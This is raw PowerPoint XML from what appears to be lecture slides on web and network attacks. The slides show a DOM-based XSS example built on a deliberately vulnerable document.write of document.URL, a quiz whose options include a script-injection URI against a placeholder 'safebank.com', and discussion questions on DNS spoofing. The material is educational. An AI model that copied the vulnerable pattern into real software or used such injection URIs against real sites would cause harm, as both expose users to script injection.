        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URIs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cause</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> execution?</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1032908">
              <a:spcBef>
                <a:spcPts val="367"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Hello</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1032908"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572680" y="450262"/>
            <a:ext cx="7044267" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>0:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Based</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-33" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1747520" y="3402584"/>
          <a:ext cx="8761306" cy="1103374"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1133687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4547447">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3080172">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="371856">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2075"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-25" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>pos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.indexOf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="818181"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>"name="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>)+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5"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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365759">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2039"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.write</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.substring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>pos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.length</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10"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65759">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2039"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnR w="53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2300">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>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7" name="object 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8" name="object 8"/>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33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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10" name="object 10"/>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1" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="4897938"/>
            <a:ext cx="358987" cy="1079655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2333"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="512"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>b.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="507"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>c.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171786" y="4897937"/>
            <a:ext cx="10126133" cy="1066318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2333"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://attacker.com</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://safebank.com/welcome.php?name=doEvil() </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://safebank.com/welcome.php?name=&lt;scrip</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>t&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>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 Spoofing (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013380" y="1285186"/>
            <a:ext cx="10572162" cy="5071163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Lots of questions!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>How does Trudy know when the DNS query is sent and what it is for?</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b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>How can Trudy supply a fake DNS reply that appears to be real?</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b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>What happens when the real DNS reply shows up?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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solutions to each issue …</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
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="DNS Spoofing example">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A8CC48-D40B-9B4C-9550-F52ECECD99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3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4C1A43-83B7-163A-7D4D-425BA2CFA975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="5751" t="7216" r="4223" b="10790"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6220119" y="3658317"/>
            <a:ext cx="5943600" cy="3063158"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="667822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8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2819400" cy="36957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4" name="object 4"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104986" y="23706"/>
            <a:ext cx="6361007" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5533675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ype</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ype</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7"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11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="4897938"/>
            <a:ext cx="358987" cy="1079655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2333"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="512"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>b.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="507"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>c.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171786" y="4897937"/>
            <a:ext cx="10126133" cy="1066318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2333"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://attacker.com</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://safebank.com/welcome.php?name=doEvil() </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
